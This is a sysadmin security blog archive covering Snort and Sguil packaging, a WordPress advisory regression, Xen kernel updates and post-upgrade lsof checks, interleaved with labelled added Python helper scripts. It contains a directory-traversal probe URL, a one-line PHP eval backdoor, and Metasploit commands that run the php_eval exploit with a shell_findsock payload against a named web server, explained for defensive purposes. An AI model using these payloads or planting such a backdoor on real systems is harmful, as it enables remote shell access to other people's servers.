08.05.10

snort-2.8.6.1 debian/ubuntu packages

Posted in Information, OpenSourceSoftware, Linux Distributions, Debian, Ubuntu, Security, Sguil, Snort, Sourcefire at 10:58 am by Edward Bjarte Fjellskål

Back from vacation :)

I did package 2.8.6.0, but it never made it to the public before I went on vacation :/

You can find 2.8.6.1 here:
http://debs.gamelinux.org/snort/hardy/

-*> Snort! <*-
Version 2.8.6.1 IPv6 GRE (Build 39)

06.29.10

Prads 0.2.0 released

Posted in Information, OpenSourceSoftware, Debian, Ubuntu, Security, Sguil, Snort, PRADS at 4:28 pm by Edward Bjarte Fjellskål

As Kacper stated here, PRADS 0.2.0 has been released!

You can download some Debian packages here, or you can check out the Git repo here.

Bug reports, issues, thoughts or any comments are very welcome!

Enjoy!

03.28.10

Sguil on Ubuntu 10.04 LTS (Lucid Lynx)

Posted in Information, OpenSourceSoftware, Linux Distributions, Debian, Ubuntu, Security, Sguil at 3:04 pm by Edward Bjarte Fjellskål

As Ubuntu 10.04 (Lucid Lynx) is the next LTS (Long Term Support) version of Ubuntu and is coming out soon (April 29, 2010), I have started to look at how sguil and my .deb packages will work on it.

I installed Lucid Lynx yesterday and installed my server and sensor debs on it.

Some first notes:

* MySQL is not eating the create_sguildb.sql (just remove the comments)
* Lucid (and Karmic) does not ship with tclx8.3 :( (installing the Hardy version worked just fine)

(I filed a bug report with Ubuntu, hoping to get tclx8.3 into the final release…)

So, from my first tests, it seems to work fine!

I have yet to test the sguil-client on Lucid, and I also did not get to test with an extensive amount of traffic and operations on the Lucid test server.

So, looking promising :)

02.25.10

snort-2.8.5.3 debian/ubuntu packages

Posted in Information, OpenSourceSoftware, Linux Distributions, Debian, Ubuntu, Snort, Sourcefire at 2:27 pm by Edward Bjarte Fjellskål

Loglevel: INFO

I have packed snort 2.8.5.3 for Ubuntu Hardy and Jaunty:
http://debs.gamelinux.org/snort/hardy/
http://debs.gamelinux.org/snort/jaunty/


-*> Snort! <*-
Version 2.8.5.3 IPv6 (Build 124)

09.07.09

[SECURITY] [DSA 1871-2] New wordpress packages fix regression

Posted in Information, OpenSourceSoftware, Debian, Security at 4:00 pm by Edward Bjarte Fjellskål

After installing “[SECURITY] [DSA 1871-1] New wordpress packages fix several vulnerabilities” from 23 August 2009, I quickly saw that there was something wrong in the logs:
PHP Fatal error: Call to undefined function absint() in /usr/share/wordpress/wp-includes/functions.php on line 2008.

I looked over the DSA and identified the fix for CVE-2008-4769 as the change that broke this. Then I emailed Steffen Joeris, who released the DSA, and notified him about my findings. Two hours later, Giuseppe Iuculano sent me an update, which I installed and confirmed worked, and in which I could not find any regressions.

I looked at CVE-2008-4769 and at the Secunia advisory, which claims that the vulnerability only works on the Windows platform. This probably explains why Debian waited so long to include the fix. The original CVE is from 2008-04-25, so this is old news btw…

From advisories:
“It was discovered that the get_category_template function is prone to a directory traversal vulnerability, which could lead to the execution of arbitrary code. This can be exploited to include arbitrary PHP files from local resources via directory traversal attacks. Successful exploitation allows execution of arbitrary PHP code, but requires privileges to store PHP files on an affected system and that WordPress is installed on a Windows platform.”

I have only registered generic attacks in the wild against the ‘cat’ parameter in my gamelinux.org and other web logs (dating back to Dec 2006). No requests seem to aim at exploiting this vulnerability specifically.
An example of a URL that was supposed to work (not confirmed):
http://www.gamelinux.org/?cat=1.php/../searchform?
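Since the post only mentions generic probes against the cat parameter, here is an added example (my code, not the post's and not Debian's) that scans Apache combined-format access log lines for requests aiming a traversal payload at WordPress's cat parameter, including percent-encoded and double-encoded variants. The log format assumed is Apache's default combined format, and the sample lines at the bottom are constructed for the demo, not real traffic.

```python
#!/usr/bin/env python3
# Added example (my code, not the post's): flag requests that aim a
# directory-traversal payload at WordPress's 'cat' query parameter, the
# get_category_template issue (CVE-2008-4769) the DSA fixes. Input is Apache
# combined-format access log text; the sample lines at the bottom are
# constructed for this demo.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined format. Only ip and url are used; the rest is matched so a
# malformed line is skipped rather than misparsed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# What the traversal looks like once decoded: climb out of the template
# directory, or smuggle a ".php/" segment as the quoted URL does.
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|\.php/)', re.IGNORECASE)

def decode_fully(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding (%252e%252e -> ..)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_cat_requests(lines):
    """Return (client ip, raw url, decoded cat value) for every request whose
    'cat' parameter carries a traversal marker. Numeric categories pass."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group('url')).query
        for cat in parse_qs(query, keep_blank_values=True).get('cat', []):
            decoded = decode_fully(cat)          # parse_qs already did one round
            if TRAVERSAL_RE.search(decoded):
                hits.append((m.group('ip'), m.group('url'), decoded))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Aug/2009:10:00:01 +0200] "GET /?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Aug/2009:10:02:13 +0200] "GET /?cat=1.php/../searchform? HTTP/1.1" 200 512 "-" "curl/7.19"',
    '198.51.100.7 - - [23/Aug/2009:10:02:14 +0200] "GET /index.php?p=3&cat=1.php%252f%252e%252e%252fsearchform HTTP/1.1" 200 512 "-" "curl/7.19"',
    '203.0.113.5 - - [23/Aug/2009:10:05:00 +0200] "GET /wp-login.php HTTP/1.1" 200 1200 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for ip, url, decoded in suspicious_cat_requests(SAMPLE_LOG):
        print(f"{ip}\t{url}\tcat={decoded!r}")
```

Feed it `open("/var/log/apache2/access.log")` instead of SAMPLE_LOG on a real box. The decode loop matters: a single unquote leaves %2e%2e%2f untouched, which is exactly what a double-encoded probe counts on.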

The DSA regression was released 4 days after the original DSA BTW.

09.04.09

DUAL NAS SATA (10/100) with Debian Etch

Posted in Information, OpenSourceSoftware, Debian at 8:00 am by Edward Bjarte Fjellskål

For 898,- NOK (right around £100) at Clas Ohlson here in Norway, you get a nice little NAS server (AID 38-2447). Straight out of the box it's a low-end NAS, but I bought it in the spirit of installing a full-blown Linux distro on it. And so I did.

DUAL HDD NAS

It took me about 30 minutes, from when I started reading the howtos, through downloading and preparing the image to the hard drive and flashing the initrd of the Dual NAS, until it was up and running.

My notes:
* When you connect to the telnet boot menu, ping the NAS in one console, and when it starts answering, you have about one second to connect to it via telnet in another console.

* It needs a DHCP server to obtain an IP address after Debian is booted…

* The Debian Etch image from Felix Mellmann is rather old (21 Nov 2007), so you need to upgrade it (it contains weak ssh keys etc.)

* It seems that it will not work with Debian Lenny (Complaining about old kernel)

If anyone has any insight into how to compile and install a newer working kernel for this hardware, I would be interested :)
Also, the link to the original source of the kernel which comes by default with this NAS would be great (I saw it yesterday, but I can't seem to find it again).

Meanwhile, I fully recommend this buy for a small, cheap home server.

05.14.09

Updating Linux Xen kernels on DomU

Posted in Information, OpenSourceSoftware, SuSE, Debian, Ubuntu, Redhat, Virtualization, CentOS, Security at 5:30 pm by Edward Bjarte Fjellskål

I see sloppy administrators do this again and again…

They might update the Xen-enabled Linux kernel on Dom0, but the DomUs often keep the old one, for various reasons.

In a (para)virtualised environment, the freedom to run different Linux distributions is often a goal. If you keep a single-distribution stack, like Ubuntu Hardy for both Dom0 and the DomUs, or CentOS 5.x for both, keeping the DomU kernels up to date is low hassle.

The hassle starts when you deploy mixed environments, like Ubuntu Hardy as Dom0 and CentOS 5.x as DomU, or vice versa. You could set up CentOS or Ubuntu to use each other's kernel packages, though that seemed a bit overkill for my setup. Having a Debian Etch DomU on an Ubuntu Hardy Dom0 is fixable by pointing Etch at Hardy's kernel packages via an apt repo.

PyGrub solves some hassles, so I recommend reading up on that and verifying that CVE-2007-4993 is not affecting you.

But for the cases where I have a bit of hassle and don't want to use PyGrub, I wrote a small bash script to update the Linux kernels.
Get the script here, and update/change/modify or learn from it before you use it.
It powers down the DomU if it is booted and mounts the DomU's logical volume, then copies the kernel modules into the DomU filesystem, runs depmod and unmounts the filesystem. Finally it prints the small change you need to make to your xen-domU.cfg (I don't use pygrub).
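The procedure just described, reconstructed as an added Python example. This is not the author's bash script (which is linked, not shown, on the page). It assumes the Debian/Ubuntu file names /boot/vmlinuz-<version>, /boot/initrd.img-<version> and /lib/modules/<version>, the classic xm toolstack, a mount point of /mnt/domu, and a DomU config that uses kernel = and ramdisk = lines; the DomU name, LV device and kernel version are taken from the command line. The module copy and the cfg snippet are plain functions so you can dry-run them against any two directory trees; the xm/mount/depmod calls only run from the command-line entry point, as root on Dom0.

```python
#!/usr/bin/env python3
# Added example (not the post's own script): stage a Dom0 kernel's modules
# into a DomU's root filesystem and print the xen-domU.cfg lines to change.
# Assumes Debian/Ubuntu naming: /boot/vmlinuz-<ver>, /boot/initrd.img-<ver>,
# /lib/modules/<ver>, and the classic xm toolstack. All names are assumptions.
import os
import shutil
import subprocess
import sys

def domu_cfg_snippet(version, boot_dir="/boot"):
    """Return the kernel/ramdisk lines for a DomU config that does not use pygrub."""
    return (
        f'kernel  = "{boot_dir}/vmlinuz-{version}"\n'
        f'ramdisk = "{boot_dir}/initrd.img-{version}"\n'
    )

def stage_modules(version, src_root, dst_root):
    """Copy <src_root>/lib/modules/<version> into <dst_root>/lib/modules.
    Returns the destination directory. Refuses to merge into an existing
    tree so a half-finished earlier run is noticed instead of papered over."""
    src = os.path.join(src_root, "lib", "modules", version)
    dst = os.path.join(dst_root, "lib", "modules", version)
    if not os.path.isdir(src):
        raise FileNotFoundError(f"no modules for {version} under {src_root}")
    if os.path.exists(dst):
        raise FileExistsError(f"{dst} already exists in the DomU filesystem")
    os.makedirs(os.path.dirname(dst), exist_ok=True)
    shutil.copytree(src, dst, symlinks=True)
    return dst

def domu_is_running(name):
    """True if `xm list <name>` succeeds (xm exits non-zero for unknown domains)."""
    out = subprocess.run(["xm", "list", name], capture_output=True, text=True)
    return out.returncode == 0

def update_domu(name, lv_path, version, mountpoint="/mnt/domu"):
    """The full procedure: power down, mount the LV, copy modules, run depmod
    against the DomU tree, unmount, and print the cfg change."""
    if domu_is_running(name):
        subprocess.run(["xm", "shutdown", "-w", name], check=True)
    os.makedirs(mountpoint, exist_ok=True)
    subprocess.run(["mount", lv_path, mountpoint], check=True)
    try:
        stage_modules(version, "/", mountpoint)
        # -b points depmod at the DomU root so modules.dep is written there
        subprocess.run(["depmod", "-a", "-b", mountpoint, version], check=True)
    finally:
        subprocess.run(["umount", mountpoint], check=True)
    print(f"Now put this in the config for {name}:")
    print(domu_cfg_snippet(version), end="")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: update-domu-kernel.py <domU-name> </dev/vg/lv> <kernel-version>")
    update_domu(*sys.argv[1:4])
```

Note that the kernel and initrd themselves stay on Dom0 (that is what the kernel = and ramdisk = lines point at); only the modules have to live inside the DomU filesystem, which is why a mismatch between the two is so easy to miss.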

BTW: This paper has a nice walk-through of going from a Xen DomU to Xen Dom0, bypassing SELinux: http://invisiblethingslab.com/pub/xenfb-adventures-10.pdf. Recommended read :)

Now go and update some Kernels!

03.18.09

Microsoft doesn’t get Free Software, Linux and Security - Again.

Posted in Information, OpenSourceSoftware, Linux Distributions, Debian, Ubuntu, Security at 12:21 pm by Edward Bjarte Fjellskål

Yesterday, Computerworld.no wrote an article on the Police/Conficker/Free software debate going on here in Norway.

Information director Eirik Lae Solberg at Microsoft Norway had a chance to comment:
“- If one had used a similar Linux distribution from the same time, one would have significant security issues.”

That is only true if one did not upgrade! And in the GNU/Linux/Free Software world, upgrading does not present any unmanageable issues.

I have personally managed lots of servers for large customers and universities, and when a new distribution release has come out (take Debian as a very good example), you can change the package sources from the current release's repository to the new release's repository, and with some rather simple command-line-fu upgrade to the latest major Debian version.

Ubuntu has made this easy for desktop users: using a graphical front-end on your server (I don't), you can click your way to a distribution upgrade.

I still recommend having people in the loop who have done such an upgrade before you try it on your own. Always keep a working backup, and you could even try the upgrade in a virtual machine before you actually do it in production.

Eirik Lae Solberg even goes so far as to claim that Zone-H.org shows that Linux is more `hacked` than Windows… Using Zone-H.org as a reliable source for such a “scientific” statement is just what Microsoft is known for doing. Well, just to let you all know, if you bother to check Zone-H.org yourself, this is what you might find today:

$ GET http://zone-h.org/archive/special=1/page=1 | grep "<td>Linux" | wc -l
5
$ GET http://zone-h.org/archive/special=1/page=1 | grep "<td>Win" | wc -l
7

As you see: today's score is 5 boxes running Linux and 7 running Windows.

I wrote a quick bash script (get it here) to check the first 30 pages and print out the total sum:

$ bash bin/Eirik_Lae_Solberg.sh
Total Linux: 289
Total Microsoft: 390

To summarize: on the last 30 pages from Zone-H, 289 defaced websites were running Linux, while 390 were running Windows.
(If you run the script yourself, the numbers will probably change; these were the numbers from today.)

So, given the hard facts rather than the marketing propaganda Eirik Lae Solberg from Microsoft wants you to believe, make up your own mind, and don't believe whatever you hear from Mister Microsoft…

BTW: Zone-H is not a good reference for measuring operating system security, if you didn't know that… But it is a good way to point out that Eirik Lae Solberg doesn't know much about operating system security, and that he would rather focus on telling you that Microsoft is way better than everybody else…
For how long will you eat that lie?

02.28.09

Spawning a shell on the established connection to the webserver in Metasploit.

Posted in OpenSourceSoftware, Debian, Ubuntu, Security, Metasploit, Back|Track at 9:28 am by Edward Bjarte Fjellskål

A good firewall setup has ingress and egress filtering. On a new setup I like to set very strict rules for incoming and outgoing traffic. When setting up a new LAMP server, making sure it can only connect out to the places it actually needs access to is good security practice. Then open port 80 for connections from the world, minus .ru and .cn etc :)

So I thought…

Then egypt, from Metasploit, wrote the “php/shell_findsock” payload and showed it to me, and I think it is awesome!

If you can get the LAMP server to execute the shell_findsock payload in some way, you can in many cases get a shell over the established HTTP connection! You can also use the payload with other PHP exploits in the framework.

egypt states that “this payload leaves conspicuous evil-looking entries in the apache error logs”, but I did not get any on my Debian Etch test server. On my Ubuntu Intrepid, however, I got:
sh: Syntax error: Bad fd number
and
Invalid method in request exit

egypt also states: “The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache”
My test on a plain fresh install of Ubuntu 8.10 (Intrepid Ibex) shows that it works.
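The mechanism egypt refers to (an established socket without the CLOEXEC flag surviving the exec of a spawned shell), shown as an added Python example that is neither part of this post nor of Metasploit. A parent accepts a loopback connection, then spawns a child the way a web server spawns a shell, without telling it any fd number; the child walks its own descriptors, picks the first connected socket and writes to it. Nothing here touches Apache or PHP, and the only variable is whether FD_CLOEXEC is set on the sockets before the exec. It assumes Linux or another POSIX system where Python's os.set_inheritable maps onto FD_CLOEXEC.

```python
#!/usr/bin/env python3
# Added example (not from the post, not Metasploit code): why a findsock-style
# payload works. The parent accepts a loopback connection, then spawns a child
# the way a web server spawns a shell; the child gets no fd number from us and
# has to discover the connection on its own. FD_CLOEXEC decides the outcome.
import os
import socket
import subprocess
import sys

# Child side, run in a fresh interpreter so nothing but inherited fds is shared.
# It walks fds 3..63, keeps the sockets, and writes to the first *connected*
# one it finds (a listener has no peer, so getpeername() raises and it is skipped).
FINDSOCK_CHILD = r"""
import os, socket, stat, sys
found = []
for fd in range(3, 64):
    try:
        if stat.S_ISSOCK(os.fstat(fd).st_mode):
            found.append(fd)
    except OSError:
        pass
for fd in found:
    try:
        s = socket.socket(fileno=fd)   # adopt the inherited descriptor
        s.getpeername()                 # connected? a listener raises ENOTCONN
        s.sendall(b"hello from the spawned child\n")
        break
    except OSError:
        pass
sys.stdout.write(" ".join(str(fd) for fd in found))
"""

def inherited_socket_fds(cloexec):
    """Accept a loopback connection and exec a child with the listening and
    accepted sockets either marked FD_CLOEXEC (cloexec=True) or left
    inheritable (cloexec=False). Returns (socket fds the child found,
    bytes the 'client' side received from the child)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    # The client end stays non-inheritable (Python's default since 3.4),
    # so only the server-side sockets are in play.
    client = socket.create_connection(listener.getsockname())
    conn, _ = listener.accept()
    try:
        # set_inheritable(fd, False) sets FD_CLOEXEC; True clears it.
        os.set_inheritable(conn.fileno(), not cloexec)
        os.set_inheritable(listener.fileno(), not cloexec)
        out = subprocess.run(
            [sys.executable, "-c", FINDSOCK_CHILD],
            capture_output=True, text=True,
            close_fds=False,   # like a server that never scrubs its fds
            check=True,
        )
        found = [int(x) for x in out.stdout.split()]
    finally:
        conn.close()       # FIN to the client, so the recv() loop terminates
        listener.close()
    chunks = []
    while True:
        data = client.recv(4096)
        if not data:
            break
        chunks.append(data)
    client.close()
    return found, b"".join(chunks)

if __name__ == "__main__":
    for flag in (False, True):
        fds, msg = inherited_socket_fds(cloexec=flag)
        print(f"FD_CLOEXEC={flag}: child found sockets {fds}, client got {msg!r}")
```

With the flag clear, the child finds both the listener and the accepted connection and its greeting arrives on the client side over the very connection the parent accepted; with FD_CLOEXEC set, the child finds nothing. That second run is the fix egypt mentions: mark sockets close-on-exec (or spawn with close_fds=True) and an egress filter is no longer the only thing standing between a code-execution bug and an interactive shell.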

In the test case, I left my “backdoor” on the server in test.php with the code <?php eval($_GET['evalme']); ?>, which is the default for this Metasploit module.
Short version:

msf > use exploit/unix/webapp/php_eval
msf exploit(php_eval) > set PAYLOAD php/shell_findsock
msf exploit(php_eval) > set RHOST www.gamelinux.org
msf exploit(php_eval) > exploit

Screenshot:
Metasploit with payload php/shell_findsock

And you thought that you were safe!

On my Debian Etch, the suhosin patch stopped the attack, but not on my Ubuntu Intrepid.

02.05.09

…and after you upgrade, don't forget to `lsof`

Posted in Information, OpenSourceSoftware, Linux Distributions, SuSE, Debian, Ubuntu, Redhat, CentOS, Security at 10:12 pm by Edward Bjarte Fjellskål

BTW: Upgrading might not be enough…

After upgrading (up2date, yum, apt, …) my Linux systems, I check with lsof to see if any processes need a restart…

Why?

Because, running processes might still be using old libraries and binaries etc, and would need a restart to use the new ones…

So… You might be vulnerable, even if you do install security updates regularly…

On older versions of lsof, I used to issue: lsof +L1|grep DEL
This does not seem to be sufficient on newer versions of lsof… Might be a bug?

After searching the web for an easier or better way of doing this, I found little… I did not even find any good info on the way I am used to doing it… If you have a smarter way of checking this, I would love to hear from you…

Here are some references to what I found:
* A bugzilla thread on redhat.com. It also has a script for Red Hat based systems.
* Debian/Ubuntu based systems come with debian-goodies… apt-get install debian-goodies and then you can use checkrestart, which checks for programs that need a restart :)

To manually check, here are some commands you can issue, depending on your version of lsof.

# lsof -n +L | grep -w DEL | egrep -v " (/dev|/SYSV|/tmp)"
# lsof -n | grep "path inode="
# lsof -n +L1 | egrep -w "txt|mem" | grep -v " /SYSV"
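As an added example (not from the post), the same check done without lsof, by reading /proc/<pid>/maps directly: any mapping whose backing file is marked (deleted) is a library or binary that was replaced or unlinked on disk after the process mapped it, which is exactly what an upgraded package leaves behind. The exclusion list mirrors the egrep -v in the commands above, with /memfd: and /run/ added since those are anonymous by design; the maps text at the bottom is constructed for the demo.

```python
#!/usr/bin/env python3
# Added example, not from the post: the `lsof +L1 | grep DEL` check done by
# reading /proc/<pid>/maps directly. A process still mapping a file that the
# package manager replaced shows that mapping with a "(deleted)" suffix.
# SKIP_PREFIXES mirrors the post's egrep -v; /memfd: and /run/ are added
# because those objects are unlinked by design, not by an upgrade.
import os
import re

SKIP_PREFIXES = ("/dev/", "/SYSV", "/tmp/", "/memfd:", "/run/")

# address range, perms, offset, dev, inode, then the path (absent for anon maps)
MAPS_LINE = re.compile(
    r"^[0-9a-f]+-[0-9a-f]+ \S{4} [0-9a-f]+ \S+ \d+\s+(?P<path>\S.*)$"
)

def deleted_mappings(maps_text):
    """Return the sorted list of file paths in one maps file whose backing
    file is gone or replaced (suffix ' (deleted)'), minus pseudo-files that
    are deleted by design."""
    paths = set()
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            continue
        path = m.group("path")
        if not path.endswith(" (deleted)"):
            continue
        path = path[: -len(" (deleted)")]
        if path.startswith(SKIP_PREFIXES):
            continue
        paths.add(path)
    return sorted(paths)

def processes_needing_restart(proc="/proc"):
    """Scan every /proc/<pid>/maps this user may read (run as root for the
    full picture). Returns {pid: [stale paths]} for processes to restart."""
    result = {}
    if not os.path.isdir(proc):
        return result
    for pid in os.listdir(proc):
        if not pid.isdigit():
            continue
        try:
            with open(os.path.join(proc, pid, "maps")) as fh:
                stale = deleted_mappings(fh.read())
        except OSError:        # process exited, or not ours to read
            continue
        if stale:
            result[int(pid)] = stale
    return result

# Constructed maps excerpt (not from a real system): libc and libssl were
# replaced on disk, the SysV segment and /dev/zero mapping are noise.
SAMPLE_MAPS = """\
00400000-004c1000 r-xp 00000000 08:01 131074     /usr/sbin/apache2
7f0a3c000000-7f0a3c16c000 r-xp 00000000 08:01 262201     /lib/libc-2.7.so (deleted)
7f0a3c16c000-7f0a3c36c000 ---p 0016c000 08:01 262201     /lib/libc-2.7.so (deleted)
7f0a3c400000-7f0a3c401000 rw-s 00000000 00:04 98304      /SYSV00000000 (deleted)
7f0a3c500000-7f0a3c501000 rw-s 00000000 00:0f 1234       /dev/zero (deleted)
7f0a3c600000-7f0a3c650000 r-xp 00000000 08:01 270001     /usr/lib/libssl.so.0.9.8 (deleted)
7f0a3c700000-7f0a3c721000 rw-p 00000000 00:00 0 
7fff5a000000-7fff5a021000 rw-p 00000000 00:00 0          [stack]
"""

if __name__ == "__main__":
    print("sample:", deleted_mappings(SAMPLE_MAPS))
    for pid, paths in sorted(processes_needing_restart().items()):
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
        except OSError:
            comm = "?"
        print(f"{pid}\t{comm}\t{', '.join(paths)}")
```

This catches the same thing the lsof pipelines do, and it does not depend on how a given lsof version prints the DEL column, which is the inconsistency the post ran into. The one thing it cannot see is a process that re-execs into a new binary but keeps the old shared memory; for that, the inode-based lsof variant above is still the better tool.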

Hope you make this check a habit after updating your servers…
